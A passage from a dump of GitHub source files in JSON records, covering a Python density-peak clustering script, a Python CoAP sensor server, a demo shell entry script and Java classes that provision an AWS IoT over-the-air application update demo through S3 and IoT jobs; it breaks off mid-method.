point:point.gamma, reverse=True)\n gammas=[point.gamma for point in pts_sorted_by_gamma]\n # derivative1st = [gammas[i] - gammas[i + 1] for i in range(0, len(gammas)-1)]\n from kneed import KneeLocator\n kn = KneeLocator([i for i in range(len(gammas))], gammas, curve='convex', direction='decreasing')\n if display:\n plt.title('gamma elbow point')\n plt.xlabel('n')\n plt.ylabel('gamma')\n plt.vlines(x=kn.elbow, ymin=0,ymax=gammas[0],colors='r',linestyles = \"--\", label='elbow=%d'%(kn.elbow))\n plt.scatter([i for i in range(len(gammas))],gammas,s=20,marker='o')\n plt.scatter(kn.elbow, gammas[kn.elbow], s=30, marker='o',c='r')\n plt.legend()\n # plt.scatter([i+1 for i in range(len(derivative1st))], derivative1st, s=20, marker='o',c='r')\n plt.show()\n\n num_class=kn.elbow\n n_centre_point=pts_sorted_by_gamma[:num_class]\n n_centre_id = [point.id for point in n_centre_point]\n return n_centre_id\n\ndef clustring_CDP(n_centre_id:List[int], pts:List[Point], display:bool=True):\n label=1\n for centre_id in n_centre_id:\n id2point[centre_id].label=label\n label+=1\n\n for point in pts:\n min_dis=MAX_DELTA\n l=-1\n for centre_id in n_centre_id:\n if centre_id==point.id:\n l=id2point[centre_id].label\n break\n dis=point.edge_all[centre_id]\n if dis<min_dis:\n min_dis=dis\n l=id2point[centre_id].label\n point.label=l\n\n if display:\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label for p in pts]\n cx = [id2point[id].x[0] for id in n_centre_id]\n cy = [id2point[id].x[1] for id in n_centre_id]\n clabels = [id2point[id].label for id in n_centre_id]\n plt.title('clustring result')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.scatter(cx, cy, s=DISPLAY_SCATTER_SIZE*3, c=clabels, marker='o')\n plt.axis('scaled')\n plt.savefig('clustring_CDP.png',dpi=500)\n plt.show()\n\n\ndef clustring_DiegoGeneric(n_centre_id:List[Point], pts:List[Point], display:bool=True,arrow:bool=False):\n pq = [] # 优先队列\n label = 1\n inqueue=set()\n solved=set()\n for centre_id in n_centre_id:\n id2point[centre_id].label = label\n label += 1\n\n for centre_id in n_centre_id:\n id2point[centre_id].cost=0\n heapq.heappush(pq, id2point[centre_id])\n inqueue.add(centre_id)\n\n while pq:\n heapq.heapify(pq)\n top = heapq.heappop(pq)\n inqueue.remove(top.id)\n solved.add(top.id)\n for id in top.edge_all:\n if id in solved:\n continue\n cost_sum=top.cost+pow(top.edge_all[id],P)\n cost=pow(cost_sum,1/P)\n if cost<id2point[id].cost:\n id2point[id].cost=cost\n id2point[id].cost_sum = cost_sum\n id2point[id].pre=top.id\n id2point[id].label=top.label\n if (id not in inqueue) and (id not in solved):\n heapq.heappush(pq,id2point[id])\n inqueue.add(id)\n\n if display:\n if arrow:\n for point in pts:\n if point.pre is not None:\n plt.arrow(point.x[0],\n point.x[1],\n id2point[point.pre].x[0]-point.x[0]-(id2point[point.pre].x[0]-point.x[0])/5,\n id2point[point.pre].x[1]-point.x[1]-(id2point[point.pre].x[1]-point.x[1])/5,\n head_width=5,\n head_length=5,\n color='red',\n alpha=0.4)\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label for p in pts]\n cx = [id2point[id].x[0] for id in n_centre_id]\n cy = [id2point[id].x[1] for id in n_centre_id]\n clabels = [id2point[id].label for id in n_centre_id]\n plt.title('clustring result')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.scatter(cx, cy, s=DISPLAY_SCATTER_SIZE*3, c=clabels, marker='o')\n plt.axis('scaled')\n plt.savefig('clustring_DiegoGeneric_result.png', dpi=500)\n plt.show()\n\ndef clustring_ours(n_centre_id:List[Point], pts:List[Point], display:bool=True,arrow:bool=False):\n pq = [] # 优先队列\n label = 1\n inqueue=set()\n solved=set()\n for centre_id in n_centre_id:\n id2point[centre_id].label = label\n label += 1\n\n for centre_id in n_centre_id:\n id2point[centre_id].cost=0\n heapq.heappush(pq, id2point[centre_id])\n inqueue.add(centre_id)\n\n while pq:\n heapq.heapify(pq)\n top = heapq.heappop(pq)\n inqueue.remove(top.id)\n solved.add(top.id)\n for id in top.edge_eps:\n if id in solved:\n continue\n cost_sum=top.cost+pow(top.edge_eps[id],P)\n cost=pow(cost_sum,1/P)\n if cost<id2point[id].cost:\n id2point[id].cost=cost\n id2point[id].cost_sum = cost_sum\n id2point[id].pre=top.id\n id2point[id].label=top.label\n if (id not in inqueue) and (id not in solved):\n heapq.heappush(pq,id2point[id])\n inqueue.add(id)\n\n if display:\n if arrow:\n for point in pts:\n if point.pre is not None:\n plt.arrow(point.x[0],\n point.x[1],\n id2point[point.pre].x[0]-point.x[0]-(id2point[point.pre].x[0]-point.x[0])/5,\n id2point[point.pre].x[1]-point.x[1]-(id2point[point.pre].x[1]-point.x[1])/5,\n head_width=5,\n head_length=5,\n color='red',\n alpha=0.4)\n x = [p.x[0] for p in pts]\n y = [p.x[1] for p in pts]\n labels = [p.label for p in pts]\n cx = [id2point[id].x[0] for id in n_centre_id]\n cy = [id2point[id].x[1] for id in n_centre_id]\n clabels = [id2point[id].label for id in n_centre_id]\n plt.title('clustring result')\n plt.scatter(x, y, s=DISPLAY_SCATTER_SIZE, c=labels, marker='o')\n plt.scatter(cx, cy, s=DISPLAY_SCATTER_SIZE*3, c=clabels, marker='o')\n plt.axis('scaled')\n plt.savefig('clustring_ours_result.png', dpi=500)\n plt.show()\n\n\nif __name__==\"__main__\":\n # id2point,pts=dataset('data/207_ecg_20190312_rr1_rr.txt','data/207_ecg_20190312_rr1_rr.gs.txt')\n id2point,pts=dataset('data/99_synthetic_dendrites.txt','data/99_synthetic_dendrites.gs.txt')\n find_edge(pts)\n decision_graph(pts)\n n_centre_id = find_albow(pts)\n\n # clustring_CDP(n_centre_id, pts)\n\n # begin=time.time()\n # clustring_DiegoGeneric(n_centre_id,pts,arrow=True)\n # end=time.time()\n # clustring_DiegoGeneric_duration=end-begin\n\n begin = time.time()\n clustring_ours(n_centre_id, pts, arrow=True)\n end = time.time()\n clustring_ours_duration = end - begin\n print(clustring_ours_duration)\n # Jaccard Coef\n a = 0\n b = 0\n c = 0\n d = 0\n for i in range(len(pts)):\n for j in range(i):\n a += (1 if pts[i].label_real == pts[j].label_real and pts[i].label == pts[j].label else 0)\n b += (1 if pts[i].label_real == pts[j].label_real and pts[i].label != pts[j].label else 0)\n c += (1 if pts[i].label_real != pts[j].label_real and pts[i].label == pts[j].label else 0)\n # d += (1 if pts[i].label_real != pts[j].label_real and pts[i].label != pts[j].label else 0)\n jc = a / (a + b + c)\n print('Jaccard Coef:', jc)\n"
}
] | 1 |
azyuqian/POEModule | https://github.com/azyuqian/POEModule | c6a9198656931e7d578c0139e9505f54c8f4547f | 629ce80dad6f8acd7534d7dd4317f5fc95f255f4 | 7816f7484e87008679375bd2e868c56ea0ed5553 | refs/heads/master | 2021-01-01T17:01:07.455026 | 2015-04-17T07:55:43 | 2015-04-17T07:55:43 | 26,605,923 | 0 | 0 | null | 2014-11-13T20:14:22 | 2014-11-22T23:13:15 | 2014-11-22T23:13:14 | Python | [
{
"alpha_fraction": 0.5532716512680054,
"alphanum_fraction": 0.5601233243942261,
"avg_line_length": 32.94186019897461,
"blob_id": "88193f5bd9e5e42ebaede1863e6dc49e2669f4a9",
"content_id": "f7fc7f6e2e3eed62c0b69026339f6bffaca1b8e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2919,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 86,
"path": "/server.py",
"repo_name": "azyuqian/POEModule",
"src_encoding": "UTF-8",
"text": "\"\"\"\n Created on November 21, 2014\n Last modified on April 17, 2015 by Yaodong Yu\n\n @author: Ruibing Zhao\n @author: Peter Zhang\n\n This is the main CoAP server running on Raspberry Pi as a part of UBC ECE 2014 Capstone Project #94.\n The implementation of this CoAP client is based on aiocoap module\n\n Reference: https://aiocoap.readthedocs.org/\n\n Python3.4 is required\n\"\"\"\n\nimport logging\nimport json\n\nimport asyncio\n\nimport aiocoap\nfrom aiocoap.resource import Site\n\nimport resources as r\n\n# logging setup\nlogging.basicConfig(level=logging.INFO)\nlogging.getLogger('coap-server').setLevel(logging.DEBUG)\n# TODO: Add logging function to replace \"print\" in the code\n\n\ndef main():\n \"\"\"\n Create resource tree from given configuration file\n \"\"\"\n\n root = Site()\n\n # default resources to add\n root.add_resource('', r.RootResource(root))\n root.add_resource(('.well-known', 'core'), r.CoreResource(root))\n\n # temporarily disabled\n #root.add_resource(('alert',), r.Alert())\n\n with open('config.json') as data_file:\n sensor_list = json.load(data_file)['sensors']\n \n for sensor in sensor_list:\n # Known sensors that has been pre-defined\n if sensor['name'] == 'hello':\n root.add_resource(tuple(sensor['url'].split('/')), r.HelloWorld())\n elif sensor['name'] == 'time':\n root.add_resource(tuple(sensor['url'].split('/')), r.LocalTime())\n elif sensor['name'] == 'accelerometer':\n root.add_resource(tuple(sensor['url'].split('/')), r.Acceleration())\n elif sensor['name'] == 'temperature':\n root.add_resource(tuple(sensor['url'].split('/')), r.Temperature())\n elif sensor['name'] == 'humidity':\n root.add_resource(tuple(sensor['url'].split('/')), r.Humidity())\n elif sensor['name'] == 'joystick':\n root.add_resource(tuple(sensor['url'].split('/')), r.Joystick())\n # For unknown sensors, use template resource\n else:\n root.add_resource(tuple(sensor['url'].split('/')),\n r.ResourceTemplate(sensor['name'],\n sensor['active'],\n sensor['period'],\n sensor['min'],\n sensor['max'],\n sensor['channel']))\n\n print(\"{} resource added to path /{}\".format(sensor['name'], sensor['url']))\n '''\n # Debug information: print all fields of each resource in configuration file\n for entry in sensor:\n if entry != 'name' and entry != 'url':\n print(\"{}:{}\".format(entry, sensor[entry]))\n '''\n\n asyncio.async(aiocoap.Context.create_server_context(root))\n asyncio.get_event_loop().run_forever()\n\n\nif __name__ == '__main__':\n main()\n"
}
] | 1 |
zhiyanliu/nightswatch-builder | https://github.com/zhiyanliu/nightswatch-builder | 87e3f8a9b6041be61f6ee9f76dcfccb79b705280 | 98eb7d87ddf36c812e816ef6387d430a9d1a3983 | 0ee7b7ff2bfd97b2dec353c4fbc674fd25be0273 | refs/heads/master | 2023-02-04T21:09:29.346583 | 2020-12-21T08:44:15 | 2020-12-21T08:44:15 | 323,258,269 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6513761281967163,
"alphanum_fraction": 0.7064220309257507,
"avg_line_length": 26.25,
"blob_id": "98ea8bb61dbfab7d5a8b71d489b8378382f89ad6",
"content_id": "9540aab51d4fab60e89f7fb49abe295b085a68d6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 109,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 4,
"path": "/demo/app_xxx_src/entry.sh",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "#!/bin/sh\n\necho \"Start...\"\n/opt/nightswatch-ranger/apps/app_xxx/rootfs/entry 127.0.0.1 app_xxx /qbr/demo/lcd\n"
},
{
"alpha_fraction": 0.6571911573410034,
"alphanum_fraction": 0.6623386740684509,
"avg_line_length": 51.91056823730469,
"blob_id": "51accac3f9858192ebf1bf2712f9c299bd5c92b8",
"content_id": "392604119e44bc3f7e18c3b17bb237bbbf6a3659",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 13016,
"license_type": "permissive",
"max_line_length": 120,
"num_lines": 246,
"path": "/src/main/java/com/amazonaws/rp/nightswatch/builder/appota/AppOTADemoApplication.java",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "package com.amazonaws.rp.nightswatch.builder.appota;\n\nimport com.amazonaws.rp.nightswatch.builder.utils.IoTCore;\nimport com.amazonaws.rp.nightswatch.builder.utils.S3;\nimport com.amazonaws.rp.nightswatch.builder.utils.StackOutputQuerier;\nimport com.amazonaws.services.iot.AWSIot;\nimport com.amazonaws.services.iot.AWSIotClientBuilder;\nimport com.amazonaws.services.iot.model.DescribeThingRequest;\nimport com.amazonaws.services.iot.model.DescribeThingResult;\nimport org.apache.commons.io.FileUtils;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.File;\nimport java.io.FileOutputStream;\nimport java.io.IOException;\nimport java.io.PrintWriter;\nimport java.net.URL;\nimport java.util.Arrays;\nimport java.util.List;\n\npublic class AppOTADemoApplication {\n private final Logger log = LoggerFactory.getLogger(\"nightswatch-app-ota-demo-app\");\n private final StackOutputQuerier outputQuerier = new StackOutputQuerier();\n private final S3 s3Util = new S3();\n private final IoTCore jobDeleter = new IoTCore();\n\n private final static String APP_PKG_NAME = \"app_xxx_pkg\";\n private final static String APP_DEPLOY_JOB_DOC_NAME = \"deploy_app_xxx_pkg\";\n private final static String APP_DESTROY_JOB_DOC_NAME = \"destroy_app_xxx_pkg\";\n\n public final static String APP_V1_DEPLOY_JOB_ID = \"nw-app-ota-demo-deploy-app-v1\";\n public final static String APP_V2_DEPLOY_JOB_ID = \"nw-app-ota-demo-deploy-app-v2\";\n public final static String APP_V1_DESTROY_JOB_ID = \"nw-app-ota-demo-destroy-app-v1\";\n public final static String APP_V2_DESTROY_JOB_ID = \"nw-app-ota-demo-destroy-app-v2\";\n\n public void provisionV1(final String appOTADemoIoTStackName, final String arch, final String containerFlag)\n throws IOException {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String jobDocBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"jobdocbucketname\");\n if (jobDocBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save job documents not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String pkgFilePath = this.prepareAppPkg(arch, containerFlag, \"v1\");\n this.s3Util.uploadFile(this.log, devFileBucketName, pkgFilePath);\n\n List<String> result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v1\", \"deployment\", APP_DEPLOY_JOB_DOC_NAME);\n String deployJobDocContent = result.get(0);\n String deployJobDocFilePath = result.get(1);\n\n String deployJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, deployJobDocFilePath);\n\n String deployJobCmd = this.generateCommand(\n appOTADemoIoTStackName, deployJobDocS3ObjectPath, APP_V1_DEPLOY_JOB_ID);\n\n result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v1\", \"destroy\", APP_DESTROY_JOB_DOC_NAME);\n String destroyJobDocContent = result.get(0);\n String destroyJobDocFilePath = result.get(1);\n\n String destroyJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, destroyJobDocFilePath);\n\n String destroyJobCmd = this.generateCommand(\n appOTADemoIoTStackName, destroyJobDocS3ObjectPath, APP_V1_DESTROY_JOB_ID);\n\n System.out.println();\n System.out.println(\"Outputs:\");\n System.out.println(String.format(\"application deployment job document:\\n%s\", deployJobDocContent));\n System.out.println(String.format(\"application deployment job document url:\\n\\t%s\", deployJobDocS3ObjectPath));\n System.out.println(String.format(\"application destroy job document:\\n%s\", destroyJobDocContent));\n System.out.println(String.format(\"application destroy job document url:\\n\\t%s\", destroyJobDocS3ObjectPath));\n System.out.println(String.format(\"application deployment command line:\\n%s\", deployJobCmd));\n System.out.println(String.format(\"application destroy command line:\\n%s\", destroyJobCmd));\n }\n\n public void provisionV2(final String appOTADemoIoTStackName, final String arch, final String containerFlag)\n throws IOException {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String jobDocBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"jobdocbucketname\");\n if (jobDocBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save job documents not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String pkgFilePath = this.prepareAppPkg(arch, containerFlag, \"v2\");\n this.s3Util.uploadFile(this.log, devFileBucketName, pkgFilePath);\n\n List<String> result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v2\", \"deployment\", APP_DEPLOY_JOB_DOC_NAME);\n String deployJobDocContent = result.get(0);\n String deployJobDocFilePath = result.get(1);\n\n String deployJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, deployJobDocFilePath);\n\n String deployJobCmd = this.generateCommand(\n appOTADemoIoTStackName, deployJobDocS3ObjectPath, APP_V2_DEPLOY_JOB_ID);\n\n result = this.prepareAppJobDoc(devFileBucketName, arch, containerFlag,\n \"v2\", \"destroy\", APP_DESTROY_JOB_DOC_NAME);\n String destroyJobDocContent = result.get(0);\n String destroyJobDocFilePath = result.get(1);\n\n String destroyJobDocS3ObjectPath = this.s3Util.uploadFile(this.log, jobDocBucketName, destroyJobDocFilePath);\n\n String destroyJobCmd = this.generateCommand(\n appOTADemoIoTStackName, destroyJobDocS3ObjectPath, APP_V2_DESTROY_JOB_ID);\n\n System.out.println();\n System.out.println(\"Outputs:\");\n System.out.println(String.format(\"application deployment job document:\\n%s\", deployJobDocContent));\n System.out.println(String.format(\"application deployment job document url:\\n\\t%s\", deployJobDocS3ObjectPath));\n System.out.println(String.format(\"application destroy job document:\\n%s\", destroyJobDocContent));\n System.out.println(String.format(\"application destroy job document url:\\n\\t%s\", destroyJobDocS3ObjectPath));\n System.out.println(String.format(\"application deployment command line:\\n%s\", deployJobCmd));\n System.out.println(String.format(\"application destroy command line:\\n%s\", destroyJobCmd));\n }\n\n private String prepareAppPkg(final String arch, final String containerFlag,\n final String version) throws IOException {\n String packageDstPath = String.format(\"%s/target/app-ota-demo/app_%s_%s_%s\",\n System.getProperty(\"user.dir\"), arch, containerFlag, version);\n\n File packageDstPathFile = new File(packageDstPath);\n FileUtils.deleteDirectory(packageDstPathFile);\n boolean ok = packageDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\n \"failed to create demo application package %s directory at %s\", version, packageDstPath));\n\n String packageDstFilePath = String.format(\n \"%s/%s_%s_%s.tar.gz\", packageDstPath, APP_PKG_NAME, containerFlag, version);\n\n String packageSrcFileName = String.format(\"nw-app-ota-demo/app_%s_%s_%s/%s.tar.gz\",\n arch, containerFlag, version, APP_PKG_NAME);\n URL packageSrc = getClass().getClassLoader().getResource(packageSrcFileName);\n if (packageSrc == null)\n throw new IllegalArgumentException(\n String.format(\"application package file %s not found\", packageSrcFileName));\n\n FileOutputStream out = new FileOutputStream(packageDstFilePath);\n out.write(packageSrc.openStream().readAllBytes());\n out.close();\n\n log.info(String.format(\n \"the application package of the IoT device are prepared at %s\", packageDstFilePath));\n\n return packageDstFilePath;\n }\n\n private List<String> prepareAppJobDoc(final String jobDocBucketName, final String arch,\n final String containerFlag, final String version,\n final String deploymentFlag, final String jobDocName) throws IOException {\n try {\n String jobDocDstPath = String.format(\"%s/target/app-ota-demo/app_%s_%s_%s\",\n System.getProperty(\"user.dir\"), arch, containerFlag, version);\n\n File jobDocDstPathFile = new File(jobDocDstPath);\n FileUtils.deleteDirectory(jobDocDstPathFile);\n boolean ok = jobDocDstPathFile.mkdirs();\n if (!ok)\n throw new IOException(String.format(\"failed to create demo application %s job document directory at %s\",\n deploymentFlag, jobDocDstPath));\n\n String jobDocDstFilePath = String.format(\"%s/%s_%s.json\", jobDocDstPath, jobDocName, version);\n\n String jobDocSrcFileName = String.format(\"nw-app-ota-demo/app_%s_%s_%s/%s.json\",\n arch, containerFlag, version, jobDocName);\n URL jobDocSrcFilePath = getClass().getClassLoader().getResource(jobDocSrcFileName);\n if (jobDocSrcFilePath == null)\n throw new IllegalArgumentException(\n String.format(\"application %s job document %s not found\", deploymentFlag, jobDocSrcFileName));\n\n String doc = new String(jobDocSrcFilePath.openStream().readAllBytes());\n\n doc = doc.replace(\"<BUCKET_NAME>\", jobDocBucketName);\n doc = String.format(\"\\t%s\", doc.replace(\"\\n\", \"\\n\\t\"));\n\n PrintWriter out = new PrintWriter(jobDocDstFilePath);\n out.print(doc);\n out.close();\n\n log.info(String.format(\"the application %s job document of the IoT device are prepared at %s\",\n deploymentFlag, jobDocDstFilePath));\n\n return Arrays.asList(doc, jobDocDstFilePath);\n } catch (IOException e) {\n e.printStackTrace();\n log.error(String.format(\"failed to prepare application %s job document\", deploymentFlag));\n throw e;\n }\n }\n\n private String generateCommand(final String appOTADemoIoTStackName, final String jobDocS3ObjectPath,\n final String jobID) {\n\n String thingName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"thingname\");\n if (thingName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of IoT device not found, is the NW app OTA demo stack %s invalid?\",\n appOTADemoIoTStackName));\n\n DescribeThingRequest req = new DescribeThingRequest();\n req.setThingName(thingName);\n\n AWSIot client = AWSIotClientBuilder.defaultClient();\n DescribeThingResult result = client.describeThing(req);\n String thingARN = result.getThingArn();\n\n String s3PreSignIAMRoleARN = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"s3presigniamrolearn\");\n if (s3PreSignIAMRoleARN == null)\n throw new IllegalArgumentException(String.format(\n \"the S3 pre-sign IAM role ARN not found,\" +\n \" is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n this.jobDeleter.deleteJob(this.log, jobID);\n\n String cmd =\n \"aws iot create-job \\\\\\n\" +\n \"\\t--job-id <JOB_ID> \\\\\\n\" +\n \"\\t--targets <THING_ARN> \\\\\\n\" +\n \"\\t--document-source <JOB_DOC_URL> \\\\\\n\" +\n \"\\t--presigned-url-config \" +\n \"\\\"{\\\\\\\"roleArn\\\\\\\":\\\\\\\"<PRE_SIGN_ROLE_ARN>\\\\\\\", \\\\\\\"expiresInSec\\\\\\\":3600}\\\"\";\n\n cmd = cmd.replace(\"<JOB_ID>\", jobID);\n cmd = cmd.replace(\"<THING_ARN>\", thingARN);\n cmd = cmd.replace(\"<JOB_DOC_URL>\", jobDocS3ObjectPath);\n cmd = cmd.replace(\"<PRE_SIGN_ROLE_ARN>\", s3PreSignIAMRoleARN);\n cmd = String.format(\"\\t%s\", cmd.replace(\"\\n\", \"\\n\\t\"));\n\n return cmd;\n }\n}\n"
},
{
"alpha_fraction": 0.7364290356636047,
"alphanum_fraction": 0.7377370595932007,
"avg_line_length": 42.68571472167969,
"blob_id": "e9cc9e5360bf15ce7db6698e14fdff04e7889cb1",
"content_id": "76e03dcaaf2261800a670e944c98b01d2cd79d9f",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1529,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 35,
"path": "/src/main/java/com/amazonaws/rp/nightswatch/builder/appota/AppOTADemoService.java",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "package com.amazonaws.rp.nightswatch.builder.appota;\n\nimport com.amazonaws.rp.nightswatch.builder.utils.StackOutputQuerier;\nimport com.amazonaws.services.iot.AWSIot;\nimport com.amazonaws.services.iot.AWSIotClientBuilder;\nimport com.amazonaws.services.iot.model.DescribeEndpointRequest;\nimport com.amazonaws.services.iot.model.DescribeEndpointResult;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.IOException;\n\npublic class AppOTADemoService {\n private final Logger log = LoggerFactory.getLogger(\"nightswatch-app-ota-demo-app\");\n private final StackOutputQuerier outputQuerier = new StackOutputQuerier();\n\n public void queryEndpoint(final String appOTADemoIoTStackName) throws IOException {\n String thingName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"thingname\");\n if (thingName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of IoT device not found, is the NW app OTA demo stack %s invalid?\",\n appOTADemoIoTStackName));\n\n DescribeEndpointRequest req = new DescribeEndpointRequest();\n req.setEndpointType(\"iot:Data-ATS\");\n\n AWSIot client = AWSIotClientBuilder.defaultClient();\n DescribeEndpointResult result = client.describeEndpoint(req);\n String endpoint = result.getEndpointAddress();\n\n System.out.println();\n System.out.println(\"Outputs:\");\n System.out.println(String.format(\"MQTT service endpoint:\\n\\t%s\", endpoint));\n }\n}\n"
},
{
"alpha_fraction": 0.6784034371376038,
"alphanum_fraction": 0.6807556748390198,
"avg_line_length": 46.90140914916992,
"blob_id": "78d1b30c714a55652664f09903133b3b9b7ae906",
"content_id": "69ec1029a3279552fc2a255a6c519b5c6602325d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 13604,
"license_type": "permissive",
"max_line_length": 116,
"num_lines": 284,
"path": "/src/main/java/com/amazonaws/rp/nightswatch/builder/appota/AppOTADemoAssert.java",
"repo_name": "zhiyanliu/nightswatch-builder",
"src_encoding": "UTF-8",
"text": "package com.amazonaws.rp.nightswatch.builder.appota;\n\nimport com.amazonaws.rp.nightswatch.builder.utils.IoTCore;\nimport com.amazonaws.rp.nightswatch.builder.utils.S3;\nimport com.amazonaws.rp.nightswatch.builder.utils.StackOutputQuerier;\nimport com.amazonaws.services.iot.AWSIot;\nimport com.amazonaws.services.iot.AWSIotClientBuilder;\nimport com.amazonaws.services.iot.model.CertificateDescription;\nimport com.amazonaws.services.iot.model.DescribeCertificateRequest;\nimport com.amazonaws.services.iot.model.DescribeCertificateResult;\nimport com.amazonaws.services.iot.model.UpdateCertificateRequest;\nimport org.apache.commons.io.FileUtils;\nimport org.slf4j.Logger;\nimport org.slf4j.LoggerFactory;\n\nimport java.io.*;\nimport java.net.URL;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.zip.ZipEntry;\nimport java.util.zip.ZipOutputStream;\n\npublic class AppOTADemoAssert {\n private final Logger log = LoggerFactory.getLogger(\"nightswatch-app-ota-demo-asset\");\n private final StackOutputQuerier outputQuerier = new StackOutputQuerier();\n private final S3 s3Util = new S3();\n private final IoTCore jobDeleter = new IoTCore();\n\n private final static String PUB_KEY_NAME = \"nw-app-ota-demo-dev-public\";\n private final static String PRV_KEY_NAME = \"nw-app-ota-demo-dev-private\";\n private final static String ROOT_CA_NAME = \"root-ca.crt\";\n\n private final static String CREDENTIALS_FILE_NAME = \"credentials.zip\";\n private final static String RANGER_PKG_FILE_NAME = \"nightswatch-ranger.tar.gz\";\n\n public void provision(final String appOTADemoIoTStackName) throws IOException {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String certId = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"certid\");\n if (certId == null)\n throw new IllegalArgumentException(String.format(\"the thing certificate ID not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n // Night's Watch - Ranger stuff\n String zipFilePath = this.prepareCredentials(certId);\n String pkgFilePath = this.prepareNightsWatchRangerPackage();\n this.s3Util.uploadFile(this.log, devFileBucketName, zipFilePath);\n this.s3Util.uploadFile(this.log, devFileBucketName, pkgFilePath);\n\n String preSignedCredentialsPackageURL = this.s3Util.getObjectPreSignedUrl(\n this.log, devFileBucketName, AppOTADemoAssert.CREDENTIALS_FILE_NAME, 7);\n String preSignedRangerPackageURL = this.s3Util.getObjectPreSignedUrl(\n this.log, devFileBucketName, AppOTADemoAssert.RANGER_PKG_FILE_NAME, 7);\n\n String scriptFilePath = this.prepareSetupScript(preSignedCredentialsPackageURL, preSignedRangerPackageURL);\n\n this.s3Util.uploadFile(this.log, devFileBucketName, scriptFilePath);\n\n log.info(String.format(\"the device files is prepared at %s\", devFileBucketName));\n }\n\n public void deProvision(final String appOTADemoIoTStackName) {\n String devFileBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"devfilesbucketname\");\n if (devFileBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save device assert files not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String jobDocBucketName = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"jobdocbucketname\");\n if (jobDocBucketName == null)\n throw new IllegalArgumentException(String.format(\n \"the name of s3 bucket to save job document not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n String certId = this.outputQuerier.query(this.log, appOTADemoIoTStackName, \"certid\");\n if (certId == null)\n throw new IllegalArgumentException(String.format(\"the thing certificate ID not found, \" +\n \"is the NW app OTA demo stack %s invalid?\", appOTADemoIoTStackName));\n\n this.deactivateThingCert(certId);\n log.info(String.format(\"the device certificate %s is deactivated\", certId));\n\n this.s3Util.emptyBucket(this.log, devFileBucketName);\n log.info(String.format(\"the device files S3 bucket %s is cleaned up to empty\", devFileBucketName));\n\n this.s3Util.emptyBucket(this.log, jobDocBucketName);\n log.info(String.format(\"the job docs S3 bucket %s is cleaned up to empty\", jobDocBucketName));\n\n this.deleteJobs();\n log.info(\"all jobs are deleted\");\n }\n\n private void generateCredentials(String certId, String certFilePath, String rootCaPath,\n String publicKeyPath, String privateKeyPath) throws IOException {\n\n AWSIot iotClient = AWSIotClientBuilder.defaultClient();\n\n log.debug(\"connected to AWS IoT 